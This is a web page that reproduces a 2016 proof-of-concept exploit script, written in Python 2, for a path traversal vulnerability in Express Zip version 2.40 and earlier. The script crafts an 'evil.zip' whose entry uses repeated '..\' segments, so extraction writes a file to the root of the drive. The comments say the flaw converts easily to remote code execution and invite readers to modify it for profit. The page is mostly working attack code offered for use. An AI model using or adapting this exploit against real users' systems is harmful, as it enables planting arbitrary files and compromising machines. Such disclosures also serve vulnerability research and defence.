扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
#!/usr/bin/python -w # Title : Express Zip <= 2.40 Path Traversal # Date : 07/04/2016 # Author : R-73eN # Tested on : Windows Xp / Windows 7 Ultimate # Software Link : http://www.nchsoftware.com/zip/ # Download Link: http://www.nchsoftware.com/zip/zipplus.exe # Vulnerable Versions : Express Zip <= 2.40 # Express Zip doesn't validates " ..\ " which makes possible # to do a path traversal attack which can be converted easily to RCE # How to Reproduce: # 1- Run Exploit # 2- Right Click evil.zip go to Express Zip and click Extract Here # 3- File will be extracted to the root of the partition in this case C:\POC.txt # This quick and dirt code is written only for demonstration purposes. # If you wanna profit from it you must modify it. # Video: https://www.youtube.com/watch?v=kb43h8Hoo0o # #Banner banner = "" banner += "_________ __\n" banner +=" |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n" banner +="| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |\n" banner +="| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n" banner +=" |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner import zipfile, sys if(len(sys.argv) != 2): print "[+] Usage : python exploit.py file_to_do_the_traversal [+]" print "[+] Example: python exploit.py test.txt" exit(0) print "[+] Creating Zip File [+]" zf = zipfile.ZipFile("evil.zip", "w") zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\POC.txt") zf.close() print "[+] Created evil.zip successfully [+]" |
体验盒子
